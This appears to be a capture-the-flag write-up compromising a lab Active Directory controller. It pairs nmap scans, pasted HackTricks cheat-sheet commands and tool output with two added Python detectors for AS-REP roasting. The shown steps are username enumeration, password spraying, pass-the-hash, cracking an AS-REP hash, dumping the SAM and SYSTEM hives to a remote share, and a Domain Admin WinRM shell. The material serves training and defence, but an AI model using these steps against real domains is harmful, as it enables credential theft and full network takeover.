Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 10:44 EDT
Nmap scan report for 192.168.56.103
Host is up (0.00064s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-03 23:46:37Z) ←
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn ←
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name) ←
445/tcp open microsoft-ds? ←
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:A2:2A:A6 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows ←
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.50 seconds
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 10:45 EDT
Nmap scan report for 192.168.56.103
Host is up (0.0045s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:A2:2A:A6 (Oracle VirtualBox virtual NIC)
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required ←
Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
<🔄 Alternative Step>
crackmapexec smb 192.168.56.103:
SMB 192.168.56.103 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) ←
</🔄 Alternative Step>
echo -e '192.168.56.103\tDC01.SOUPEDECODE.LOCAL' | tee -a /etc/hosts:
192.168.56.103 DC01.SOUPEDECODE.LOCAL ←
HackTricks
[#Possible Credentials]
Username(s)            | Common passwords
-----------------------|------------------------------------------
(blank)                | (blank)
guest                  | (blank)
Administrator, admin   | (blank), password, administrator, admin
arcserve               | arcserve, backup
tivoli, tmersrvd       | tivoli, tmersrvd, admin
backupexec, backup     | backupexec, backup, arcada
test, lab, demo        | password, test, lab, demo
[#Obtain Information]
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
[#List shared folders]
It is always worth checking whether you can access anything; if you don't have credentials, try null credentials or the guest user.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
Kerbrute enum: When an invalid username is requested, the server responds with the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, which tells us the username does not exist. Valid usernames elicit either a TGT in an AS-REP response or the error KRB5KDC_ERR_PREAUTH_REQUIRED, indicating that the user is required to perform pre-authentication.
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## The --local-auth flag tells crackmapexec to try only once per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
crackmapexec can execute commands through any of mmcexec, smbexec, atexec or wmiexec, with wmiexec being the default method. You can choose which one to use with the --exec-method parameter:
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User bmark0 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User otara1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User kleo2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[...]
[-] User caiden36 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User xbella37 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smark38 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:dc54892842ace6ea9ae0f8dc3059e617$f1bab3f0b14d69f1e689f102399a39b0855f16d9f36dfd6a9659d25f0f8484e05592e1d921d90f53dcd80c9cf406b8cee2610214b7350f7ad1ecead5e62872ca83a6044d10c5177e6899e8ab98b3ee861eca740c9c33e8f7efb957c391d5d996e1777cf1b3a90f28799b1ad3d66b12faf35adee855b27fae4552f17d1dbc343458b45464f9e3520fd92a01f00b60dee32f96562958896ff06cbfc2600169fb0e5883a070dee21c961e703b9dc7034fb4eb0b08af27abd3423b86b842e2014e6e3e7ea0a1c98df0f0209db963a28b7515937c1163a7279c78e6e1d3d5cd9c81d3b12527709d10469d87290514cb669cb9312e775a6e65 ←
[-] User fmike40 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User yeli41 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User knina42 doesn't have UF_DONT_REQUIRE_PREAUTH set
[...]
john --wordlist=/usr/share/wordlists/rockyou.txt ./asrep_hash.txt:
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
internet ($krb5asrep$23$zximena448@SOUPEDECODE.LOCAL) ←
1g 0:00:00:00 DONE (2024-09-04 03:54) 33.33g/s 17066p/s 17066c/s 17066C/s angelo..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
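The two KDC behaviours used above, username enumeration answered with KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN and the AS-REP of an account without pre-authentication (etype 23, the `$krb5asrep$23$` prefix john loads), leave distinct traces in Windows Security event 4768 on the domain controller. The following Python is an added detection example, not part of this writeup or of any tool shown; the records are constructed samples using the 4768 field names (TargetUserName, IpAddress, Status, PreAuthType, TicketEncryptionType), and the count threshold is an assumption with no time window applied.

```python
from collections import Counter

# Constructed records in the shape of Windows Security event 4768 (Kerberos
# authentication ticket requested); not logs from the box in this writeup.
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"
SAMPLE_4768 = [
    # three unknown principals from one client in a row: enumeration pattern
    {"TargetUserName": "jdoe", "IpAddress": "192.168.56.50", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "asmith", "IpAddress": "192.168.56.50", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "root", "IpAddress": "192.168.56.50", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    # a single typo from a workstation: must stay below the threshold
    {"TargetUserName": "bmrak0", "IpAddress": "192.168.56.20", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    # ordinary logon: timestamp pre-auth (type 2), AES256 ticket (0x12)
    {"TargetUserName": "bmark0", "IpAddress": "192.168.56.20", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    # AS-REP roast signature: no pre-auth (type 0) and RC4 (0x17 = etype 23,
    # the "$krb5asrep$23$" prefix john loads above)
    {"TargetUserName": "zximena448", "IpAddress": "192.168.56.50", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
]

def enumeration_sources(events, threshold=3):
    """Map client IP -> count of unknown-principal failures, kept when >= threshold."""
    hits = Counter(e["IpAddress"] for e in events
                   if e["Status"].lower() == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return {ip: n for ip, n in hits.items() if n >= threshold}

def asrep_roast_candidates(events):
    """(user, ip) pairs issued a TGT with no pre-authentication over RC4."""
    return sorted({(e["TargetUserName"], e["IpAddress"]) for e in events
                   if e["Status"] == "0x0" and e["PreAuthType"] == "0"
                   and e["TicketEncryptionType"].lower() == "0x17"})

if __name__ == "__main__":
    print("enumeration sources:", enumeration_sources(SAMPLE_4768))
    print("AS-REP roast candidates:", asrep_roast_candidates(SAMPLE_4768))
```

Any account that shows up in the second list is a candidate for the same offline cracking john performed above, so the fix is to clear "Do not require Kerberos preauthentication" on it rather than only to alert.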
Try "help" to get a list of possible commands.
smb: \> dir
$WinREAgent DH 0 Sat Jun 15 15:19:51 2024
Documents and Settings DHSrn 0 Sat Jun 15 22:51:08 2024
DumpStack.log.tmp AHS 12288 Wed Sep 4 12:42:13 2024
pagefile.sys AHS 1476395008 Wed Sep 4 12:42:13 2024
PerfLogs D 0 Sat May 8 04:15:05 2021
Program Files DR 0 Sat Jun 15 13:54:31 2024
Program Files (x86) D 0 Sat May 8 05:34:13 2021
ProgramData DHn 0 Sat Jun 15 22:51:08 2024
Recovery DHSn 0 Sat Jun 15 22:51:08 2024
System Volume Information DHS 0 Sat Jun 15 15:02:21 2024
Users DR 0 Mon Jun 17 14:31:08 2024
Windows D 0 Sat Jun 15 15:21:10 2024
12942591 blocks of size 4096. 10915881 blocks available
smb: \> cd Users\zximena448\Desktop\
smb: \Users\zximena448\Desktop\> dir
. DR 0 Mon Jun 17 14:31:24 2024
.. D 0 Mon Jun 17 14:30:22 2024
desktop.ini AHS 282 Mon Jun 17 14:30:22 2024
user.txt A 33 Wed Jun 12 16:01:30 2024 ←
12942591 blocks of size 4096. 10915862 blocks available
smb: \Users\zximena448\Desktop\> get user.txt ←
getting file \Users\zximena448\Desktop\user.txt of size 33 as user.txt (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \Users\zximena448\Desktop\> exit
cat ./user.txt:
2fe79*************************** ←
HackTricks
[#Valid Credentials]
If you have valid credentials to log in to the LDAP server, you can dump all the information about the Domain Admin using:
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839
If you see a message saying that a "bind must be completed", the credentials are incorrect.
You can extract everything from a domain using:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Search base (base DN); everything below it is returned
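Once an ldapsearch dump like the one above is on disk, the same data lets a defender find which accounts are exposed to the AS-REP roasting step earlier in this writeup. This is an added example, not from the page or from HackTricks: it unfolds LDIF continuation lines, decodes base64 (`::`) values and reports enabled accounts whose userAccountControl carries DONT_REQ_PREAUTH (0x400000). The LDIF below is a constructed sample with account names borrowed from the writeup, not a dump from the box.

```python
import base64
# userAccountControl bits used here (values from Microsoft's documentation)
UAC_FLAGS = {0x2: "ACCOUNTDISABLE", 0x200: "NORMAL_ACCOUNT", 0x10000: "DONT_EXPIRE_PASSWORD",
             0x400000: "DONT_REQ_PREAUTH"}  # the bit that makes an account AS-REP roastable

# Constructed ldapsearch output (not a dump from the box): folded dn, base64 (::) value, disabled account
SAMPLE_LDIF = """\
dn: CN=zximena448,CN=Users,DC=SOUPEDEC
 ODE,DC=LOCAL
sAMAccountName: zximena448
description:: VGVzdCBhY2NvdW50
userAccountControl: 4260352

dn: CN=otara1,CN=Users,DC=SOUPEDECODE,DC=LOCAL
sAMAccountName: otara1
userAccountControl: 4194818

# search result
"""

def parse_ldif(text):
    """One {attribute: [values]} dict per dn; unfolds continuation lines, decodes 'attr::'."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]          # LDIF folds long values onto ' '-prefixed lines
        else:
            lines.append(raw)
    entries, cur = [], {}
    for line in lines + [""]:
        if not line or line.startswith("#"):   # blank or comment ends the entry
            if "dn" in cur:
                entries.append(cur)
            cur = {}
            continue
        attr, _, val = line.partition(":")
        if val.startswith(":"):                # 'attr:: <base64>' form
            val = base64.b64decode(val[1:].strip()).decode("utf-8", "replace")
        cur.setdefault(attr, []).append(val.strip())
    return entries

def uac_names(value):
    """Decode a userAccountControl integer into the flag names in UAC_FLAGS."""
    return {name for bit, name in UAC_FLAGS.items() if int(value) & bit}

def preauth_disabled(entries):
    """sAMAccountNames of enabled accounts that do not require Kerberos pre-authentication."""
    flagged = ((e, uac_names(e.get("userAccountControl", ["0"])[0])) for e in entries)
    return sorted(e["sAMAccountName"][0] for e, f in flagged
                  if "DONT_REQ_PREAUTH" in f and "ACCOUNTDISABLE" not in f)
```

Feed it the output of the ldapsearch command above (saved to a file) and run `preauth_disabled(parse_ldif(open("dump.ldif").read()))`; disabled accounts are skipped because the KDC will not issue them a TGT anyway.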
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
Or create an SMB share using Samba:
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
Windows:
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
A simple POC that abuses Backup Operator privileges to remotely dump the SAM, SYSTEM, and SECURITY hives.
[#Usage]
This proof of concept is a modified version of impacket/examples/reg.py and will work with the most recent impacket release installed. All supported impacket authentication mechanisms will work.
root@kali:~# python3 reg.py jsmith:'Spring2021'@10.0.229.1 backup -p '\\10.0.220.51\share'
Impacket v0.9.25.dev1+20220208.122405.769c3196 - Copyright 2021 SecureAuth Corporation
Dumping SAM hive to \\10.0.220.51\share\SAM
Dumping SYSTEM hive to \\10.0.220.51\share\SYSTEM
Dumping SECURITY hive to \\10.0.220.51\share\SECURITY
To use evil-winrm to connect to an IPv6 address create an entry inside /etc/hosts setting a domain name to the IPv6 address and connect to that domain.
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint ←
whoami:
soupedecode\administrator ←
whoami /groups:
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ =========================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Group Policy Creator Owners Group S-1-5-21-2986980474-46765180-2505414164-520 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Domain Admins Group S-1-5-21-2986980474-46765180-2505414164-512 Mandatory group, Enabled by default, Enabled group ←
SOUPEDECODE\Enterprise Admins Group S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Schema Admins Group S-1-5-21-2986980474-46765180-2505414164-518 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Denied RODC Password Replication Group Alias S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
whoami /priv:
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled